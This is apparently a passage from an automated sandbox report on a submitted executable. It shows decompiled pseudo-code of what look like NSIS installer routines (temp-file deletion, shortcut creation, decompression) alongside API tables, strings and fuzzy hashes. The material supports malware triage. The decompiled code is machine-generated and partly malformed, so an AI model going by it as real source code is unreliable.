								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b898 - 0x5c;
					if( *0x42b898 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E0040646B(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405A8F(_t73);
							_t40 = E00405877(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E0040521E(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E0040521E(0xfffffff1, _t73);
							return E00405ED6(_t72, _t73, 0);
						}
						L33:
						 *0x42f4c8 =  *0x42f4c8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x004058c9
0x004058ce
0x004058d7
0x004058da
0x004058e2
0x004058e5
0x004058e8
0x004058f0
0x004058f2
0x004058f3
0x00000000
0x004058f3
0x004058fe
0x00405901
0x00405901
0x00405901
0x00405905
0x00405918
0x0040591f
0x00405924
0x00405928
0x00405938
0x0040592a
0x00405930
0x00405930
0x0040593d
0x00405940
0x0040594b
0x00405951
0x00405956
0x00405966
0x00405968
0x0040596e
0x00405971
0x00405974
0x00405a2c
0x00405a2c
0x00405a30
0x00405a32
0x00405a32
0x00405a32
0x00405a32
0x00000000
0x00000000
0x00000000
0x00000000
0x0040597a
0x0040597a
0x00405983
0x00405989
0x0040598e
0x00405991
0x00405993
0x00405997
0x00405999
0x00405999
0x00405997
0x0040599c
0x0040599f
0x004059b2
0x004059b4
0x004059b9
0x004059c0
0x004059db
0x004059e0
0x004059e2
0x00405a06
0x004059e4
0x004059e4
0x004059e7
0x004059fb
0x004059e9
0x004059ec
0x004059f4
0x004059f4
0x004059e7
0x004059c2
0x004059c8
0x004059ca
0x004059d0
0x004059d0
0x004059ca
0x00000000
0x004059c0
0x004059a1
0x004059a4
0x004059a6
0x00000000
0x00000000
0x004059a8
0x004059aa
0x00000000
0x00000000
0x004059ac
0x004059b0
0x00000000
0x00000000
0x00000000
0x00405a0b
0x00405a15
0x00405a1b
0x00405a1b
0x00405a26
0x00000000
0x00405a26
0x00405942
0x00405949
0x00000000
0x00000000
0x00000000
0x00405907
0x00405907
0x00405909
0x00405a36
0x00405a38
0x00405a3b
0x00405a8c
0x00405a8c
0x00405a8c
0x00405a3d
0x00405a40
0x00405a4b
0x00405a50
0x00405a52
0x00000000
0x00000000
0x00405a55
0x00405a61
0x00405a66
0x00405a68
0x00000000
0x00405a83
0x00405a6a
0x00405a6d
0x00000000
0x00000000
0x00405a72
0x00000000
0x00405a79
0x00405a42
0x00405a42
0x00000000
0x00405a42
0x0040590f
0x00405912
0x00000000
0x00000000
0x00000000
0x00405912

APIs

DeleteFileA.KERNEL32(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
FindClose.KERNEL32(00000000), ref: 00405A26

Strings

"C:\Users\user\Desktop\yRqHWQ91dT.exe" , xrefs: 004058BF
\*.*, xrefs: 0040592A
C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\yRqHWQ91dT.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3124240197
Opcode ID: 4def77bb891c7b3960c154a2ad73ead010234d10b8a13dea3fc18deabcd134ba
Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
Opcode Fuzzy Hash: 4def77bb891c7b3960c154a2ad73ead010234d10b8a13dea3fc18deabcd134ba
Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040216B() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405AFC( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\alfons\\AppData\\Local\\Temp\\CssValidatorInstallerTemp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}

0x00402174
0x0040217e
0x00402188
0x00402195
0x004021a0
0x004021a3
0x004021bd
0x004021c3
0x004021c9
0x004021cc
0x004021d6
0x004021da
0x004021da
0x004021df
0x004021f0
0x004021f8
0x004022d4
0x004022d4
0x004022db
0x004021fe
0x004021fe
0x0040220d
0x00402211
0x00402214
0x0040221a
0x00402228
0x0040222b
0x0040222d
0x00402238
0x00402238
0x0040223d
0x0040223f
0x00402246
0x00402246
0x00402249
0x00402252
0x00402255
0x0040225a
0x0040225c
0x00402269
0x00402269
0x0040226c
0x00402278
0x0040227b
0x00402284
0x0040228a
0x00402291
0x004022aa
0x004022ac
0x004022ba
0x004022ba
0x004022aa
0x004022bd
0x004022c3
0x004022c3
0x004022c6
0x004022cc
0x004022d2
0x004022e7
0x00000000
0x00000000
0x00000000
0x004022d2
0x004022dd
0x00402a5d
0x00402a69

APIs

CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2

Strings

C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp, xrefs: 00402230

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp
API String ID: 123533781-3276176112
Opcode ID: 163f96e7a228f668ad01f6fff9a08a3bf5921adb224fce9e1f45b383d9424720
Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
Opcode Fuzzy Hash: 163f96e7a228f668ad01f6fff9a08a3bf5921adb224fce9e1f45b383d9424720
Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040646B, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040646B(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0e0);
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0e0;
			}

0x00406476
0x0040647f
0x00000000
0x0040648c
0x00406482
0x00000000

APIs

FindFirstFileA.KERNEL32(7519FA90,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\), ref: 00406476
FindClose.KERNEL32(00000000), ref: 00406482

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC

Uniqueness

Uniqueness Score: -1.00%

Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E00406055(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E004060F7();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x004027b9
0x004027cd
0x004027d8
0x004027d9
0x00402918
0x004027bb
0x004027bb
0x004027bd
0x004027bf
0x004027bf
0x00402a5d
0x00402a69

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: fe0c6c70d9fc1c67409d165531832ab6862d9141dea2be007ff0faa3f611277f
Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
Opcode Fuzzy Hash: fe0c6c70d9fc1c67409d165531832ab6862d9141dea2be007ff0faa3f611277f
Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A

Uniqueness

Uniqueness Score: -1.00%

Function 00406945, Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00406945(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004070B4( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x408408; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x408408; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040711C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00407074))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
